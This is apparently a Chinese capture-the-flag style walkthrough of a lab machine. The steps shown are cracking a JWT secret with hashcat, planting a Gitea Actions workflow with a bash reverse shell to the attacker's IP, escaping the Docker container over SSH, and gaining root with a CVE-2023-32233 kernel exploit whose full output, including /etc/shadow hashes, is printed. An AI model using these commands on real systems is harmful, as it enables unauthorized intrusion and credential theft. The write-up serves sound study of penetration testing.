kali:192.168.56.104
主机发现
arp-scan -l# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:bb:bb:02 PCS Systemtechnik GmbH
192.168.56.114 08:00:27:a6:14:7c PCS Systemtechnik GmbH
靶机:192.168.56.11
端口扫描
nmap 192.168.56.114PORT STATE SERVICE
3000/tcp open ppp
只开了一个3000端口
打开是一个gitea服务
探索里面有flask jwt auth
jwt_token看不见
不过在历史文件里面可以看到
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"解析一下没什么用
用john爆破一下密码
# hashcat -O -a 0 -m 16500 jwtt.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1906/3876 MB (512 MB allocatable), 1MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:developer88
密码是developer88
解析出来用户名是dev
然后用dev/developer88登录gitea
新创建一个仓库
然后在setting里面开启action
创建.gitea/workflows目录并写入一个反弹shell的yaml文件
# mkdir -p .gitea/workflows
┌──(root㉿kali2)-[~/Desktop]
└─# cd .gitea/workflows
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# vim shell.yaml
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# cat shell.yaml
name: demo
run-name: ${{ github.actor }} is testing out Gitea Action
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: run
steps:
- run: /bin/bash -i >& /dev/tcp/192.168.56.104/4567 0>&1
┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─#mv ~/Desktop/.gitea ~/Desktop/myshell
运行actions需要运行器,下载一个运行器
现需要注册一个runner
./act_runner register --no-interactive --instance <instance> --token <token>ip地址就是instance
在设置添加runner里面获取token
# ./act_runner register --no-interactive --instance http://192.168.56.114:3000 --token ralq3rc5Kw1V20XmovyTG0DKBMc6gQuZybTHMYHC
INFO Registering runner, arch=amd64, os=linux, version=v0.2.6.
INFO Runner name is empty, use hostname 'kali2'.
DEBU Successfully pinged the Gitea instance server
INFO Runner registered successfully. 然后run
./act_runner daemon
INFO[2024-03-07T22:44:44+08:00] Starting runner daemon
INFO[2024-03-07T22:44:44+08:00] runner: kali2, with version: v0.2.6, with labels: [ubuntu-latest ubuntu-22.04 ubuntu-20.04 ubuntu-18.04], declare successfully
然后将shell.yaml上传到仓库
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.email "dev@run.hmv"
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.name "dev"
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git add .
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git commit -m "Testing"
[main (root-commit) 2708ed7] Testing
1 file changed, 8 insertions(+)
create mode 100644 .gitea/workflows/shell.yaml
┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git push origin main
Username for 'http://192.168.56.114:3000': dev
Password for 'http://dev@192.168.56.114:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 446 bytes | 446.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://192.168.56.114:3000/dev/myshell.git
* [new branch] main -> main
之前开的监听端口也是返回了shell
不过目前还在docker里面
act@41571465a87b:~/cache/actions/e62fd81b2b2325de/hostexecutor$ ip route show
ip route show
default via 172.18.0.1 dev eth0
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 先那个稳定shell
act@41571465a87b:~/cache/actions/9246c6b12576b1d1/hostexecutor$ sudo su -
sudo su -
script /dev/null -c bash
Script started, output log file is '/dev/null'.
root@41571465a87b:~# ^Z
zsh: suspended nc -lvnp 4567
┌──(root㉿kali2)-[~/Desktop]
└─# stty raw -echo;fg
[2] - continued nc -lvnp 4567
reset
reset: unknown terminal type unknown
Terminal type? xterm
然后逃离docker
看一下ip
ip route show# default via 172.18.0.1 dev eth0
# 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 ssh连接
root@41571465a87b:~# ssh dev@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
dev@172.18.0.1's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Feb 6 15:52:41 2024 from 172.18.0.4
dev@run:~$ ls -al
total 32
drwxr-x--- 4 dev dev 4096 Mar 7 15:16 .
drwxr-xr-x 3 root root 4096 Feb 5 13:10 ..
lrwxrwxrwx 1 root root 9 Feb 5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 7 2023 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 7 2023 .bashrc
drwx------ 2 dev dev 4096 Mar 7 15:16 .cache
-rw-r--r-- 1 dev dev 807 Jan 7 2023 .profile
drwx------ 2 dev dev 4096 Feb 5 13:10 .ssh
-rw------- 1 dev dev 33 Feb 6 16:01 user.txt
dev@run:~$ cat user.txt
56f98bdfaf5186243bc4cb99f0674f58
拿到user权限
看linux内核
dev@run:~$ uname -a
Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
6.2.0-20-generic搜索知道有个CVE
Linux Kernel 权限提升漏洞 (CVE-2023-32233)-阿里云开发者社区 (aliyun.com)
openwall.com/lists/oss-security/2023/05/15/5/3
apt install gcc libmnl-dev libnftnl-dev
gcc -Wall -o exploit exp.c -lmnl -lnftnl
dev@run:~$ wget http://192.168.56.104:6677/exploit
--2024-03-07 15:24:06-- http://192.168.56.104:6677/exploit
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63456 (62K) [application/octet-stream]
Saving to: ‘exploit’
exploit 100%[===================>] 61.97K --.-KB/s in 0.003s
2024-03-07 15:24:06 (24.2 MB/s) - ‘exploit’ saved [63456/63456]
dev@run:~$ ls -al
total 96
drwxr-x--- 4 dev dev 4096 Mar 7 15:24 .
drwxr-xr-x 3 root root 4096 Feb 5 13:10 ..
lrwxrwxrwx 1 root root 9 Feb 5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 7 2023 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 7 2023 .bashrc
drwx------ 2 dev dev 4096 Mar 7 15:16 .cache
-rw-rw-r-- 1 dev dev 63456 Mar 7 15:22 exploit
-rw-r--r-- 1 dev dev 807 Jan 7 2023 .profile
drwx------ 2 dev dev 4096 Feb 5 13:10 .ssh
-rw------- 1 dev dev 33 Feb 6 16:01 user.txt
dev@run:~$ chmod +x exploit
dev@run:~$ ./exploit
[*] Netfilter UAF exploit
Using profile:
========
1 race_set_slab # {0,1}
1572 race_set_elem_count # k
4000 initial_sleep # ms
100 race_lead_sleep # ms
600 race_lag_sleep # ms
100 reuse_sleep # ms
39d240 free_percpu # hex
2a8b900 modprobe_path # hex
23700 nft_counter_destroy # hex
347a0 nft_counter_ops # hex
a nft_counter_destroy_call_offset # hex
ffffffff nft_counter_destroy_call_mask # hex
e8e58948 nft_counter_destroy_call_check # hex
========
[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] No ROOT for you:-(
[*] Please reboot the machine!
重启机器,在做就ok了
经过我多次重启,也算是拿到root权限了
pwn_uaf_del_obj read_obj_%04hx_ 11
pwn_write_new_obj ffffffff85e8b901
[*] Signaling status=0 to coordinator...
[*] Got status=0 from PWN Worker...
[*] Checking "cat /proc/sys/kernel/modprobe"...
//tmp/modprobe
/tmp/trigger: 1: ����: not found
[*] Checking "/etc/shadow"...
root:$y$j9T$xfElC0tV5a0mSPb1tZ5kq/$2xaoiScyTxIhuB/4AyqQJmtJPIg05GyrM0.xAvTyiPA:19759:0:99999:7:::
daemon:*:19462:0:99999:7:::
bin:*:19462:0:99999:7:::
sys:*:19462:0:99999:7:::
sync:*:19462:0:99999:7:::
games:*:19462:0:99999:7:::
man:*:19462:0:99999:7:::
lp:*:19462:0:99999:7:::
mail:*:19462:0:99999:7:::
news:*:19462:0:99999:7:::
uucp:*:19462:0:99999:7:::
proxy:*:19462:0:99999:7:::
www-data:*:19462:0:99999:7:::
backup:*:19462:0:99999:7:::
list:*:19462:0:99999:7:::
irc:*:19462:0:99999:7:::
_apt:*:19462:0:99999:7:::
nobody:*:19462:0:99999:7:::
systemd-network:!*:19462::::::
systemd-timesync:!*:19462::::::
messagebus:!:19462::::::
systemd-resolve:!*:19462::::::
pollinate:!:19462::::::
syslog:!:19462::::::
uuidd:!:19462::::::
tcpdump:!:19462::::::
tss:!:19462::::::
landscape:!:19462::::::
fwupd-refresh:!:19462::::::
dev:$y$j9T$/vO4x4YorAt9NZFdGFXlW/$3jEHxOuay6gjxpLjnU4qteiI6MlgZ6W/dO1Zzc3VLu/:19759:0:99999:7:::
lxd:!:19758::::::
dnsmasq:!:19758::::::
sshd:!:19759::::::
[*] You've Got ROOT:-)
# cat /root/r*
总结:1.jwt爆破
2.gitea仓库执行action反弹shell
3.docker逃逸
4.Linux内核提权CVE-2023-32233
4963
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
